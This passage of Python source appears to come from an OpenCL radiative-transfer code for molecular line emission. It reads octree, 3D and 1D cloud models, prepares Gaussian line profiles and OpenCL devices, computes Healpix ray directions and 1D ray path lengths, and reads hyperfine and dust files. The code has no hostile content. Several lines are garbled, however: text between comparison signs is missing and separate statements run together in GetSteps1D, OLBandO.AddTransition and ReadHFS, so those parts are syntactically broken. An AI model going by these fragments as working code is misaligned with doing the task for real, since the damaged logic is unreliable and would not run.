5) # OTL = octree levels\n print(\"ReadCloudOT(%s): \" % INI['cloud'], NX, NY, NZ, OTL, CELLS)\n LCELLS = zeros(OTL, int32)\n OFF = zeros(OTL, int32)\n # rho, tkin, sigma, vx, vy, vz, abu = 6*4 bytes per cell\n # 100 million cells = 2.2 GB\n RHO = zeros(CELLS, float32)\n TKIN = zeros(CELLS, float32)\n WITH_HALF = [0, 1][INI['WITH_HALF']>0]\n if (WITH_HALF==0):\n CLOUD = zeros(CELLS, cl.cltypes.float4) # vx, vy, vz, sigma\n else:\n CLOUD = np.empty((CELLS,4), cl.cltypes.half) # vx, vy, vz, sigma\n ABU = zeros(CELLS, float32)\n \"\"\"\n For density, values <= 0 correspond to links to child cells.\n For the other quantities, use the convention val<-1e10 to indicate that the cell is not a leaf node.\n \"\"\"\n # density\n cells = 0\n for level in range(OTL):\n if (level>0): OFF[level] = OFF[level-1] + cells # cells = cells on the previous level\n cells = fromfile(fp, int32, 1)[0]\n print(\" level %2d cells %6d\" % (level, cells))\n if (cells<1): break\n LCELLS[level] = cells\n tmp = fromfile(fp, float32, cells)\n if (INI['kdensity']!=1.0): tmp[nonzero(tmp>0.0)] *= INI['kdensity'] # no scaling if cell contains a link\n RHO[(OFF[level]):(OFF[level]+cells)] = tmp\n # temperature\n for level in range(OTL):\n cells = fromfile(fp, int32, 1)[0]\n if (cells!=LCELLS[level]): print(\"Error in the hierarchy file !\"), sys.exit()\n tmp = fromfile(fp, float32, LCELLS[level])\n if (INI['ktemperature']!=1.0): tmp[nonzero(tmp>0.0)] *= INI['ktemperature'] \n TKIN[(OFF[level]):(OFF[level]+cells)] = tmp\n # sigma = turbulent linewidth\n print(\"================================================================================\")\n for level in range(OTL):\n # Note: any NaN values make np.min() np.max() equal to NaN !\n cells = fromfile(fp, int32, 1)[0]\n if (cells!=LCELLS[level]): print(\"Error in the hierarchy file, in sigma !\"), sys.exit()\n tmp = fromfile(fp, float32, cells)\n m = nonzero(RHO[OFF[level]:(OFF[level]+cells)]>0.0) # must ignore sigma for links\n if (len(m[0])>0):\n #print(\"tmp-1 %12.4e %12.4e, ksigma %10.3e\" % (np.min(tmp[m]), np.max(tmp[m]), INI['ksigma']))\n if (INI['ksigma']!=1.0): tmp[m] *= INI['ksigma']\n #print(\"tmp-2 %12.4e %12.4e\" % (np.min(tmp[m]), np.max(tmp[m])))\n #print(\"Tkin %12.4e %12.4e\" % (np.min(TKIN[(OFF[level]):(OFF[level]+cells)][m]), np.max(TKIN[(OFF[level]):(OFF[level]+cells)][m])))\n if (INI['thermaldv']>0): \n tmp[m] = (np.sqrt(tmp**2.0+2.0e-10*BOLTZMANN*TKIN[(OFF[level]):(OFF[level]+cells)]/(AMU*MOL.WEIGHT)))[m]\n # print(\"tmp-3 %12.4e %12.4e\" % (np.min(tmp[m]), np.max(tmp[m])))\n INI['min_sigma'] = min([ INI['min_sigma'], np.min(tmp[m]) ])\n INI['max_sigma'] = max([ INI['max_sigma'], np.max(tmp[m]) ])\n print(\"min_sigma %12.4e, max_sigma %12.4e\" % (INI['min_sigma'], INI['max_sigma']))\n if (WITH_HALF==0):\n CLOUD[(OFF[level]):(OFF[level]+cells)]['w'] = tmp\n else:\n CLOUD[(OFF[level]):(OFF[level]+cells),3] = tmp\n print(\"================================================================================\")\n # vx, vy, vz\n for level in range(OTL):\n cells = fromfile(fp, int32, 1)[0]\n if (cells!=LCELLS[level]): print(\"Error in the hierarchy file, in vx !\"), sys.exit()\n tmp = fromfile(fp, float32, LCELLS[level])\n if (INI['kvelocity']!=1.0): tmp *= INI['kvelocity']\n if (WITH_HALF==0):\n CLOUD[(OFF[level]):(OFF[level]+cells)]['x'] = tmp\n else:\n CLOUD[(OFF[level]):(OFF[level]+cells), 0] = tmp\n for level in range(OTL):\n cells = fromfile(fp, int32, 1)[0]\n if (cells!=LCELLS[level]): print(\"Error in the hierarchy file, in vy !\"), sys.exit()\n tmp = fromfile(fp, float32, LCELLS[level])\n if (INI['kvelocity']!=1.0): tmp *= INI['kvelocity']\n if (WITH_HALF==0):\n CLOUD[(OFF[level]):(OFF[level]+cells)]['y'] = tmp\n else:\n CLOUD[(OFF[level]):(OFF[level]+cells), 1] = tmp\n for level in range(OTL):\n cells = fromfile(fp, int32, 1)[0]\n if (cells!=LCELLS[level]): print(\"Error in the hierarchy file, in vz !\"), sys.exit()\n tmp = fromfile(fp, float32, LCELLS[level])\n if (INI['kvelocity']!=1.0): tmp *= INI['kvelocity'] \n if (WITH_HALF==0):\n CLOUD[(OFF[level]):(OFF[level]+cells)]['z'] = tmp\n else:\n CLOUD[(OFF[level]):(OFF[level]+cells), 2] = tmp\n # abundance\n for level in range(OTL):\n cells = fromfile(fp, int32, 1)[0]\n if (cells!=LCELLS[level]): print(\"Error in the hierarchy file, in abundance !\"), sys.exit()\n tmp = fromfile(fp, float32, LCELLS[level])\n if (INI['kabundance']!=1.0): tmp *= INI['kabundance']\n ABU[(OFF[level]):(OFF[level]+cells)] = tmp\n fp.close()\n #\n return RHO, TKIN, CLOUD, ABU, CELLS, OTL, LCELLS, OFF, NX, NY, NZ\n\n\n\n\ndef ReadCloud3D(INI, MOL):\n \"\"\"\n Read and rescale the cloud.\n \"\"\"\n fp = open(INI['cloud'], 'rb')\n nx, ny, nz = fromfile(fp, np.int32, 3)\n cells = nx*ny*nz\n # 0 1 2 3 4 5 6\n # n, T, sigma, vx, vy, vz, x\n try:\n C = fromfile(fp, np.float32).reshape(nz*ny*nx,7)\n except:\n # perhaps cloud is in octree format but just with one hierarchy level ...\n fp.close()\n print(\"Trying to read plain cartesian cloud from octree file....\")\n fp = open(INI['cloud'], 'rb')\n nx, ny, nz, otl, cells = fromfile(fp, np.int32, 5)\n if (otl!=1):\n print(\"Trying to read cartesian grid cloud but file has %d levels of hierarchy!\" % otl)\n sys.exit(0)\n C = transpose(fromfile(fp, np.float32).reshape(7, 1+cells)[:, 1:].reshape(7, cells)) \n ###\n C[:,0] = clip(C[:,0]*INI['kdensity'], 1.0e-4, 1e15) # density\n C[:,1] = clip(C[:,1]*INI['ktemperature'], 2.0, 2900.0) # Tkin\n C[:,2] = clip(C[:,2]*INI['ksigma'], 1e-10, 1e3) # sigma, nonthermal\n if (INI['thermaldv']>0):\n C[:,2] = np.sqrt(C[:,2]**2.0 + 2.0e-10*BOLTZMANN*C[:,1]/(AMU*MOL.WEIGHT)) # add thermal broadening\n C[:,3] *= INI['kvelocity']\n C[:,4] *= INI['kvelocity']\n C[:,5] *= INI['kvelocity']\n C[:,6] *= INI['kabundance']\n #\n INI['min_sigma'] = np.min(C[:,2])\n INI['max_sigma'] = np.max(C[:,2])\n #\n RHO = C[:,0] # density\n TKIN = C[:,1] # Tkin\n CLOUD = np.zeros(cells, cl.cltypes.float4)\n CLOUD[:]['x'] = C[:,3] # vx\n CLOUD[:]['y'] = C[:,4] # vy\n CLOUD[:]['z'] = C[:,5] # vz\n CLOUD[:]['w'] = C[:,2] # sigma\n ABU = C[:,6] # left as 1d vecto\n return RHO, TKIN, CLOUD, ABU, nx, ny, nz\n \n\n\ndef ReadCloud1D(INI, MOL):\n \"\"\"\n Read and rescale 1D cloud\n Input:\n INI = initialisation parameter dictionary\n MOL = Molecule\n Return:\n RADIUS, VOLUME, RHO, TKIN, CLOUD, ABU = cloud data, where\n CLOUD is [ Vrad, Rc, dummy, sigma ]\n Note:\n File has data in the order of: rho, Tkin, sigma, abu, vrad\n \"\"\"\n fp = open(INI['cloud'], 'rb')\n CELLS = fromfile(fp, np.int32, 1)[0]\n VOLUME = np.zeros(CELLS, np.float32)\n RADIUS = fromfile(fp, np.float32, CELLS)\n # cloud file may be normalised or it may be absolute values [cm]\n GL_IN_CLOUD_FILE = RADIUS[CELLS-1] ;\n for i in range(CELLS): RADIUS[i] /= GL_IN_CLOUD_FILE # RADIUS is normalised !!\n VOLUME[0] = RADIUS[0]**3.0\n for i in range(1, CELLS): VOLUME[i] = RADIUS[i]**3.0 - RADIUS[i-1]**3.0\n RHO = np.zeros(CELLS, np.float32)\n TKIN = np.zeros(CELLS, np.float32)\n ABU = np.zeros(CELLS, np.float32)\n CLOUD = np.zeros(CELLS, cl.cltypes.float4)\n # CLOUD.x/y/z/w = Vrad, Rc, dummy, sigma\n molwei = MOL.WEIGHT\n for i in range(CELLS):\n buf = fromfile(fp, np.float32, 5) # rho, Tkin, sigma, abundance, Vrad\n RHO[i] = max(1.0e-5, buf[0] * INI['kdensity'])\n TKIN[i] = min(2900.0, buf[1] * INI['ktemperature'])\n ABU[i] = max(1.0e-20, buf[3] * INI['kabundance'])\n CLOUD[i]['z'] = ABU[i] # z=abundance\n CLOUD[i]['x'] = buf[4] * INI['kvelocity'] # x=Vrad\n sigma = buf[2] * INI['ksigma'] # multiplication applied to nonthermal component only\n if (INI['thermaldv']>0):\n sigma = np.sqrt(sigma*sigma + 2.0e-10*BOLTZMANN*TKIN[i] / (AMU*MOL.WEIGHT))\n CLOUD[i]['w'] = sigma # w = sigma\n if (not(isfinite(sigma))):\n print(\" ??? TKIN %10.3e, buf[2] %.3e, ksigma %.3e\\n\" % (TKIN[i], buf[2], INI['ksigma']))\n fp.close()\n RHO = clip(RHO, 1.0e-5, 1e20)\n TKIN = clip(TKIN, 2.0, 2900.0)\n ABU = clip(ABU, 1.0e-20, 2.0)\n #\n if (0):\n CLOUD[0]['y'] = 0.5*RADIUS[0] # y=Rc\n for icell in range(1, CELLS): # radius weighted by volume\n CLOUD[icell]['y'] = 0.5*(RADIUS[icell-1]+RADIUS[icell])\n if (1):\n # CLOUD[].y = effective shell radius\n CLOUD[0]['y'] = 0.5*RADIUS[0] # y=Rc\n for icell in range(1,CELLS): # radius weighted by volume\n CLOUD[icell]['y'] = np.sqrt( 0.5*RADIUS[icell-1]**2.0 + 0.5*RADIUS[icell]**2.0 )\n if (0):\n # check the effect of replacing Vrad with the average over inner and outer boundary values\n # ... effect minimal (in test case)\n for icell in range(CELLS-1, -1, -1):\n CLOUD[icell]['x'] = 0.5*(CLOUD[icell-1]['x']+CLOUD[icell]['x'])\n print(\"================================================================\")\n print(\"CELLS %d\" % CELLS)\n print(\"DENSITY %10.3e to %10.3e, average_vol %10.3e\" % (np.min(RHO), np.max(RHO), sum(VOLUME*RHO)/sum(VOLUME)))\n print(\"TKIN %10.3e to %10.3e, average_vol %10.3e\" % (np.min(TKIN), np.max(TKIN), sum(VOLUME*TKIN)/sum(VOLUME)))\n print(\"THERMAL SIGMA %10.3e to %10.3e\" % (sqrt(2.0e-10*BOLTZMANN*np.min(TKIN) / (AMU*molwei)),\n sqrt(2.0e-10*BOLTZMANN*max(TKIN) / (AMU*molwei))))\n sigma = CLOUD[:]['w']\n print(\"TOTAL SIGMA %10.3e to %10.3e, average_vol %10.3e\" % (np.min(sigma), np.max(sigma), sum(VOLUME*sigma)/sum(VOLUME)))\n print(\"ABUNDANCE %10.3e to %10.3e\" % (np.min(ABU), np.max(ABU)))\n print(\"VRAD %10.3e to %10.3e\" % (np.min(CLOUD[:]['x']), np.max(CLOUD[:]['x'])))\n print(\"================================================================\")\n \n if (INI['angle']>0.0): # cloud size defines by ini file\n INI['GL'] = INI['angle'] * ARCSEC_TO_RADIAN * INI['distance'] * PARSEC # [cm] = 1D cloud radius\n if (GL_IN_CLOUD_FILE>1.0001): # but also cloud file had values in [cm]\n if (fabs(INI['GL']-GL_IN_CLOUD_FILE)>(0.01*INI['GL'])):\n print(\"**** WARNING: CLOUD FILE SPECIFIED RADIUS %.3e BUT INI FILE SCALED IT TO %.3e\\n\" % \n (GL_IN_CLOUD_FILE, INI['GL']))\n else:\n INI['GL'] = GL_IN_CLOUD_FILE\n INI['angle'] = INI['GL'] / (ARCSEC_TO_RADIAN*INI['distance']*PARSEC)\n #\n if (0):\n print(\"________________________________________________________________________________\")\n print('RADIUS')\n print(RADIUS)\n print('VOLUME')\n print(VOLUME) \n print(\"TKIN\")\n print(TKIN)\n print(\"SIGMA\")\n print(CLOUD[:,]['w'])\n print(\"VRAD\")\n print(CLOUD[:,]['x'])\n print(\"ABU\")\n print(CLOUD[:,]['z'])\n print(\"________________________________________________________________________________\")\n sys.exit()\n return RADIUS, VOLUME, RHO, TKIN, CLOUD, ABU\n\n\n\ndef GaussianProfiles(s0, s1, ng, nchn, dv):\n \"\"\"\n Prepare array of n Gaussian profiles between sigma = s0 and s1 \n \"\"\"\n # print(\"Gaussian profiles, nchn=%d\" % nchn) \n a = clip(s0, 0.05, 1.0)\n b = clip(s1, 0.05, 100.0)\n a = 0.999*a\n b = 1.001*b\n SIGMA0 = a\n SIGMAX = 10.0**( np.log10(b/a)/(ng-1.0) )\n ## SIGMAX = 10.0**(np.log10(max([a, 1.01*b])/b) / (ng-1.0))\n if (SIGMAX>1.06): print(\"*** WARNING: SIGMAX = %.4f > 1.06 !!!\" % SIGMAX)\n print(\"GAUSS(%.3e, %.3e) : [%.3e, %.3e], SIGMA0 %.3e, SIGMAX %.3e\" % \n (s0, s1, SIGMA0, SIGMA0*SIGMAX**(ng-1.0), SIGMA0, SIGMAX))\n GAU = np.zeros((ng, nchn), np.float32)\n v = (-0.5*(nchn-1.0)+arange(nchn))*dv\n # integration limits, LIM = first and last nonzero channel\n LIM = np.zeros(ng, cl.cltypes.int2)\n for i in range(ng):\n s = SIGMA0 * SIGMAX**i\n GAU[i,:] = clip(np.exp(-v*v/(s*s)), 1.0e-30, 1.0) # doppler width ??\n GAU[i,:] /= sum(GAU[i,:])\n m = nonzero(GAU[i,:]>2.0e-5)\n if (1):\n LIM[i]['x'] = m[0][ 0]\n LIM[i]['y'] = m[0][-1]\n else:\n LIM[i]['x'] = 0\n LIM[i]['y'] = nchn-1 \n asarray(GAU, np.float32).tofile('gauss_py.dat')\n return SIGMA0, SIGMAX, GAU, LIM\n \n \n \ndef InitCL(GPU=0, platforms=[], idevice=0, sub=0, verbose=True):\n \"\"\"\n Usage:\n platform, device, context, queue, mf = InitCL(GPU=0, platforms=[], sub=0, idevice=0, verbose=True)\n Input:\n GPU = if >0, try to return a GPU device instead of CPU\n platforms = optional array of possible platform numbers\n idevice = index of the device within the selected platform (default idevice=0)\n sub = optional number of threads for a subdevice (first returned)\n verbose = if True, print out the names of the platforms\n \"\"\"\n platform, device, context, queue = None, None, None, None\n possible_platforms = range(6)\n if ((len(platforms)>0)&(platforms[0]>=0)):\n possible_platforms = platforms\n device = []\n for iplatform in possible_platforms:\n if (verbose): print(\"try platform %d, idevice=%d, request GPU=%d\" % (iplatform, idevice, GPU))\n try:\n platform = cl.get_platforms()[iplatform]\n if (GPU>0):\n device = [ platform.get_devices(cl.device_type.GPU)[idevice] ]\n else:\n device = [ platform.get_devices(cl.device_type.CPU)[idevice] ]\n if (sub>0):\n # try to make subdevices with sub threads, return the first one\n dpp = cl.device_partition_property\n device = [device[0].create_sub_devices( [dpp.EQUALLY, sub] )[0],]\n context = cl.Context(device)\n queue = cl.CommandQueue(context)\n break\n except:\n pass\n # print(\"***InitCL completed***\")\n if (verbose):\n print(\" Platform: \", platform)\n print(\" Device: \", device)\n return platform, device, context, queue, cl.mem_flags\n \n\n\ndef InitCL_string(INI, verbose=True):\n \"\"\"\n Usage:\n platform, device, context, queue, mf = InitCL(INI, verbose=True)\n Input:\n INI = structure built based on the initialisation file\n we use INI['sdevice'] string to identify the requested device\n and only set INI['GPU'] to indicate whether that was a CPU or a GPU\n verbose = if True, print out the names of the platforms\n \"\"\"\n platforms = cl.get_platforms()\n if (1): # print out platform.version, device.version for all devices\n print(\"================================================================================\")\n for iplatform in range(len(platforms)):\n print(' Platform [%d]: %s' % (iplatform, platforms[iplatform].name))\n devices = platforms[iplatform].get_devices(cl.device_type.CPU)\n for idevice in range(len(devices)):\n print(' CPU [%d]: %s' % (idevice, devices[idevice].name))\n devices = platforms[iplatform].get_devices(cl.device_type.GPU)\n for idevice in range(len(devices)):\n print(' GPU [%d]: %s' % (idevice, devices[idevice].name))\n print(\"================================================================================\")\n ###\n platform, device, context, queue = None, None, None, None\n device = []\n for iplatform in range(len(platforms)):\n platform = cl.get_platforms()[iplatform]\n devices = platform.get_devices(cl.device_type.GPU)\n for idevice in range(len(devices)):\n if (INI['sdevice'] in devices[idevice].name): \n device = [ devices[idevice] ]\n INI['GPU'] = 1\n break\n if (len(device)>0): break\n devices = platform.get_devices(cl.device_type.CPU)\n for idevice in range(len(devices)):\n if (INI['sdevice'] in devices[idevice].name):\n device = [ devices[idevice] ]\n INI['GPU'] = 0\n break\n if (len(device)>0): break\n if (len(device)<1):\n print(\"InitCL_string: could not find any device matching string: %s\" % INI['sdevice'])\n sys.exit()\n print(INI['sdevice'])\n # try to make subdevices with sub threads, return the first one\n try:\n context = cl.Context(device)\n queue = cl.CommandQueue(context)\n except:\n print(\"Failed to create OpenCL context and quee for device: \", device[0])\n sys.exit()\n if (verbose):\n print(\"Selected:\")\n print(\" Platform: \", platform)\n print(\" Device: \", device)\n print(\"================================================================================\") \n return platform, device, context, queue, cl.mem_flags\n \n\n\ndef IRound(a, b):\n if (a%b==0):\n return a\n return (a//b+1)*b\n\n\n\ndef Pixel2AnglesRing(nside, ipix):\n # Convert Healpix pixel index to angles (phi, theta), theta=0.5*pi-lat, phi=lon\n # Uses formulas for maps in RING order.\n # int nl2, nl4, npix, ncap, iring, iphi, ip, ipix1 ;\n # float fact1, fact2, fodd, hip, fihip ;\n npix = 12*nside*nside # total number of points\n theta, phi = -999.0, -999.0\n # if ((ipix<0)|(ipix>=npix)): return -999.0, -999.0\n ipix1 = ipix + 1 # in {1, npix}\n nl2 = 2*nside \n nl4 = 4*nside \n ncap = 2*nside*(nside-1) # points in each polar cap, =0 for nside =1\n fact1 = 1.5*nside \n fact2 = 3.0*nside*nside \n if (ipix1<=ncap): # North Polar cap\n hip = ipix1/2.0\n fihip = int(hip)\n iring = int(sqrt(hip-sqrt(fihip))) + 1 # counted from North pole\n iphi = ipix1 - 2*iring*(iring - 1) \n theta = arccos(1.0-iring*iring / fact2)\n phi = (iphi - 0.5) * pi/(2.0*iring)\n else:\n if (ipix1<=nl2*(5*nside+1)): # Equatorial region ------\n ip = ipix1 - ncap - 1\n iring = int(ip/nl4) + nside # counted from North pole\n iphi = (ip%nl4) + 1 \n fodd = 0.5 * (1 + (iring+nside)%2) # 1 if iring+nside is odd, 1/2 otherwise\n theta = arccos( (nl2 - iring) / fact1 )\n phi = (iphi - fodd) * pi /(2.0*nside)\n else: # South Polar cap\n ip = npix - ipix1 + 1\n hip = ip/2.0 \n fihip = int(hip) \n iring = int(sqrt( hip - sqrt(fihip) )) + 1 # counted from South pole\n iphi = 4*iring + 1 - (ip - 2*iring*(iring-1))\n theta = arccos( -1.0 + iring*iring / fact2 ) \n phi = (iphi - 0.5) * pi/(2.0*iring) \n return theta, phi\n\n\n\n\n\ndef GetHealpixDirection(nside, ioff, idir, X, Y, Z, offs=1, DOUBLE_POS=False, theta0=-99.0, phi0=-99.0, with_healpy=False):\n \"\"\"\n Return ray direction and position based on Healpix angular discretisation.\n Input:\n nside = resolution parameter of the Healpix map\n ioff = index for the offset of the initial position\n idir = index of the Healpix pixel (=direction)\n X, Y, Z = root dimensions of the model\n offs = number of positions per dimension per cell\n Default is offs=1, one ray per surface element, ioff=0-3 cover all rays\n For offs=2, 2x2 rays per cell, ioff=0-15 covers all the ray start positions over 2x2 cell.\n Kernel steps the whole surface at steps of 2 cells, starting from the offsets provided here.\n offs=1 => ioff=0:4, offs=2 => ioff=0:16\n \"\"\"\n if (DOUBLE_POS):\n POS = cl.cltypes.make_double3()\n ## DIR = cl.cltypes.make_double3()\n else:\n POS = cl.cltypes.make_float3()\n DIR = cl.cltypes.make_float3()\n \n \n if (nside==0): # mostly for debugging -- only the six cardinal directions\n a = ioff // 4 # offsets within a cell\n b = ioff % 4 # offsetss between 2x2 cells\n d1 = (0.01171875+(a//offs)) / offs + (b//2)\n d2 = (0.91015625+(a% offs)) / offs + (b% 2)\n d1 = (0.531+(a//offs)) / offs + (b//2)\n d2 = (0.53+(a% offs)) / offs + (b% 2)\n b = 1.0e-5\n # WHY IS TEX DEPENDENT ON THIS ANGLE ????????????????????????????????\n # b=0.3 gives expected Tex when collisions are weak... = 1.086 \n b = 0.3 \n b = 1.0e-4\n a = sqrt(1.0-b*b-b*b)\n if (idir in [0,1]):\n DIR['x'], DIR['y'], DIR['z'] = a*[1.0,-1.0][idir % 2], b, b\n POS['x'], POS['y'], POS['z'] = 0.0, d1, d2\n elif (idir in [2,3]):\n DIR['y'], DIR['x'], DIR['z'] = a*[1.0,-1.0][idir % 2], b, b\n POS['y'], POS['x'], POS['z'] = 0.0, d1, d2\n else:\n DIR['z'], DIR['x'], DIR['y'] = a*[1.0,-1.0][idir % 2], b, b\n POS['z'], POS['x'], POS['y'] = 0.0, d1, d2\n return POS, DIR, idir\n \n if (with_healpy==False):\n theta, phi = Pixel2AnglesRing(nside, idir)\n else:\n theta, phi = healpy.pix2ang(nside, idir) # theta from the pole\n if ((theta0>-2.0*pi)&(phi>-4.0*pi)):\n theta, phi = theta0, phi0\n else:\n phi += 0.137534213 # to avoid exact (+-0.666667,+-0.6666667, 0.3333333) directions\n # theta = 0.00005+theta*0.99995\n pass\n\n DIR['x'] = sin(theta)*cos(phi)\n DIR['y'] = sin(theta)*sin(phi)\n DIR['z'] = cos(theta)\n if (1):\n if (abs(DIR['x'])<1.0e-4): DIR['x'] = 1.0e-4 \n if (abs(DIR['y'])<1.0e-4): DIR['y'] = 1.0e-4 \n if (abs(DIR['z'])<1.0e-4): DIR['z'] = 1.0e-4 \n tmp = 1.0/sqrt(DIR['x']*DIR['x']+DIR['y']*DIR['y']+DIR['z']*DIR['z']) \n DIR['x'] = tmp*DIR['x']\n DIR['y'] = tmp*DIR['y']\n DIR['z'] = tmp*DIR['z']\n # Which is the LEADING edge\n if (1):\n tmp = asarray([DIR['x'], DIR['y'], DIR['z']], float64)\n imax = argmax(abs(tmp))\n tmp[imax] *= 1.00001\n tmp /= sqrt(sum(tmp**2.0))\n DIR['x'], DIR['y'], DIR['z'] = tmp\n LEADING = 2*imax + [0,1][tmp[imax]<0.0]\n else:\n if (abs(DIR['x'])>abs(DIR['y'])):\n if (abs(DIR['x'])>abs(DIR['z'])):\n if (DIR['x']>0.0): LEADING = 0 # lower X\n else: LEADING = 1 # upper X\n else:\n if (DIR['z']>0.0): LEADING = 4 # lower Z\n else: LEADING = 5 # upper Z\n else: # Y or Z\n if (abs(DIR['y'])>abs(DIR['z'])):\n if (DIR['y']>0.0): LEADING = 2 # lower Y\n else: LEADING = 3 # upper Y\n else:\n if (DIR['z']>0.0): LEADING = 4 # lower Z\n else: LEADING = 5 # upper Z\n if (0): # one ray per cell, rays at steps of two cells, ioff=0-3\n d1 = 0.5 + int(ioff/2)\n d2 = 0.5 + int(ioff%2)\n # print(d1, d2)\n else:\n # index a for offs*offs position inside a cell, index b to cover 2x2 cells\n # (each call to simulation kernel will do rays at steps of two cells)\n a = ioff // 4 # index for offsets inside a cell\n b = ioff % 4 # index for offsets among 2x2 cells, ioff = [0, 4*offs*offs[\n # .... inside cell .... ... 2x2 cells ...\n # For some reason PL is sensitive to offsets ??\n # set offsets to 0.49 and 0.49 and PL has up to 10% variations\n # this worked for 25^3 test up to MAXL=4\n d1 = (0.403714567+(a//offs)) / offs + (b//2)\n d2 = (0.513975432+(a% offs)) / offs + (b% 2)\n d1 = (0.01171875+(a//offs)) / offs + (b//2)\n d2 = (0.91015625+(a% offs)) / offs + (b% 2)\n \n if (LEADING in[0,1]): # lower or upper X-axis face\n POS['x'], POS['y'], POS['z'] = 0, d1, d2 \n elif (LEADING in[2,3]): \n POS['y'], POS['x'], POS['z'] = 0, d1, d2\n else: \n POS['z'], POS['y'], POS['x'] = 0, d1, d2\n ###\n return POS, DIR, LEADING\n \n \n \ndef GetSteps1D(CELLS, RADIUS, NRAY, IP, DIRWEI):\n \"\"\"\n For strictly 1D models:\n Precalculate for each ray the distance it travels in each of the shells = STEP\n calculate the average length within each cell (for emission weighting) = APL\n Input:\n CELLS = number of cells\n RADIUS = shell radiae [0,1]\n NRAY = number of rays\n IP = impact parameters of the rays [0,1]\n DIRWEI = weight of each ray [NRAY]\n called with DIRWEI=[] before writing of spectra, when STEP is updated\n but DIRWEI and APL are not used\n Return:\n STEP = length of each ray within each of the cells [NRAY, CELLS]\n APL = total length of ray paths within each cell [CELLS]\n \"\"\"\n STEP = np.zeros((NRAY, CELLS), np.float32)\n APL = np.zeros(CELLS, np.float32)\n # innermost cell\n print(\"Innermost cell R=%.6f, Innermost ray %.6f\" % (RADIUS[0], IP[0]))\n for iray in range(NRAY):\n if (IP[iray]0): APL[0] += tmp*DIRWEI[iray]\n else:\n STEP[iray, 0] = -1.0\n # the rest of the cells: IPR1\n for icell in range(1, CELLS):\n for iray in range(NRAY):\n if (IP[iray]>RADIUS[icell]): # shell is not hit at all\n STEP[iray, icell] = -1.0 \n else:\n if (IP[iray]>RADIUS[icell-1]): # almost tangential\n tmp = 2.0*sqrt((RADIUS[icell]**2.0)-(IP[iray]**2.0)) + 1.0e-6 \n STEP[iray, icell] = tmp \n if (len(DIRWEI)>0): APL[icell] += tmp*DIRWEI[iray] \n else: # two steps, incoming and outcoming ray are both:\n tmp = sqrt((RADIUS[icell ]**2.0)-(IP[iray]**2.0)) - \\\n sqrt((RADIUS[icell-1]**2.0)-(IP[iray]**2.0)) + 1.0e-6 \n STEP[iray, icell] = tmp \n if (len(DIRWEI)>0): APL[icell] += 2.0*tmp*DIRWEI[iray] \n if (STEP[0, 0]<1e-10):\n print(\" *** INNERMOST CELL IS NOT HIT BY ANY RAYS -> increase nray and/or adjust alpha (SPTEP[0,0]=%.5e)!!!\" % STEP[0,0])\n print(\"IP = \")\n print(IP)\n sys.exit(0)\n if (len(DIRWEI)<1): return STEP # this one when called before writing the spectra\n return STEP, APL # this one before simulations (DIRWEI used, APL updated)\n \n \n\nclass BandO:\n # Bands of LTE hfs\n N = 0 # number of components\n WIDTH = 0.0 # velocity channel\n BANDWIDTH = 0.0 # bandwidth without distance between components\n VMIN = 0.0\n VMAX = 0.0\n VELOCITY = asarray([], float32) # line offsets in km/s for each component\n WEIGHT = asarray([], float32) # relative weights\n \n def Init(self, bandwidth, width):\n self.N = 0 \n self.BANDWIDTH = bandwidth \n self.WIDTH = width \n self.VMIN = 0.0 \n self.VMAX = 0.0 \n\n def Add(self, velocity, weight): # add another line component to the band\n self.VELOCITY = concatenate((self.VELOCITY, [velocity,]))\n self.WEIGHT = concatenate((self.WEIGHT, [weight,]))\n self.N += 1\n self.VMAX = np.max(self.VELOCITY)\n self.VMIN = np.min(self.VELOCITY)\n \n def Channels(self):\n # return the number of channels needed for this band\n return (int)((self.BANDWIDTH+self.VMAX-self.VMIN)/self.WIDTH) ;\n\n\n \nclass OLBandO:\n BANDS = 0 # number of frequency bands (with possibly multiple components)\n NCMP = [] # number of components in each band\n TRAN = [] # list of transitions in each band\n FMIN = [] # minimum transition frequency in the band\n FMAX = [] # maximum transition frequency in the band\n DV = 0.0 # channel width\n\n def Init(self, dv):\n self.BANDS = 0\n self.DV = dv\n \n def Bands(self):\n return self.BANDS\n \n def Components(self, iband):\n return self.NCMP[iband] \n \n def AddBand(self, components):\n self.TRAN.append( zeros(components, int32) )\n self.NCMP.append( 0 )\n self.FMIN.append( 1.0e30 )\n self.FMAX.append( 0.0 )\n self.BANDS += 1\n \n def AddTransition(self, tran, freq):\n iband = self.BANDS-1\n self.TRAN[iband][self.NCMP[iband]] = tran\n self.NCMP[iband] += 1\n if (freqself.FMAX[iband]): self.FMAX[iband] = freq \n \n def GetTransition(self, iband, icmp):\n return self.TRAN[iband][icmp]\n \n def Channels(self, iband):\n # Return NCHN = the number of extra channels needed\n return 0\n\n\n \ndef ReadHFS(INI, MOL):\n \"\"\"\n Read decription of HS structure, for calculations assuming LTE between HFS components.\n Input:\n filename = name of the HFS structure description\n Return:\n BAND = structure containing the band information\n channels = maximum number of channels needed for any of the transitions \n \"\"\"\n BAND = [] # BandO for each transition\n width = INI['bandwidth'] / INI['channels'] # this remains unchanged\n for tran in range(MOL.TRANSITIONS):\n BAND.append(BandO())\n BAND[tran].Init(INI['bandwidth'], width)\n # First set up transitions mentioned in the hfs file\n lines = open(INI['hfsfile']).readlines()\n iline = 0\n while (iline %3d = %d components\" % (tran, upper, lower, BAND[tran].N))\n if (BAND[tran].N>1):\n for i in range(BAND[tran].N):\n print(\" off %7.3f weight %7.3f\" % (BAND[tran].VELOCITY[i], BAND[tran].WEIGHT[i]))\n MAXCMP = max([MAXCMP, BAND[tran].N])\n bandwidth = MAXCHN*width # BAND.WIDTH == width == INI['bandwidth'] / INI['channels']\n return BAND, MAXCHN, MAXCMP\n \n \n \ndef ReadDustTau(filename, gl, cells, transitions):\n \"\"\"\n Read dust optical depths from file => tau[cells, transitions]\n File contains optical depths [1/pc], values are here converted to [1/GL]\n Input:\n filename = name of the optical depth file saved from CRT\n gl = GL for the current model [cm]\n cells = number of cells in the model \n transitions = number of transitions in the calculation\n \"\"\"\n fp = open(filename, 'rb')\n a, b = fromfile(fp, int32, 2)\n if ((a!=cells)|(b!=transitions)):\n print(\"*** Error in ReadDustTau: (CELLS,TRANSITIONS)=(%d,%d), file has (%d,%d)\" % (cells,transitions,a,b))\n sys.exit()\n tau = fromfile(fp, float32).reshape(cells, transitions)\n fp.close()\n tau[:,:] *= gl/PARSEC # optical depth per GL\n if (1):\n tau = clip(tau, 1.0e-30, 1.0e30) # to avoid division-by-zero errors in the update kernel\n return asarray(tau, float32)\n\n\n\ndef ReadDustEmission(filename, cells, transitions, width, mol):\n \"\"\"\n Read dust emission from file => emit[cells, transitions]\n File contains values = photons / s / Hz 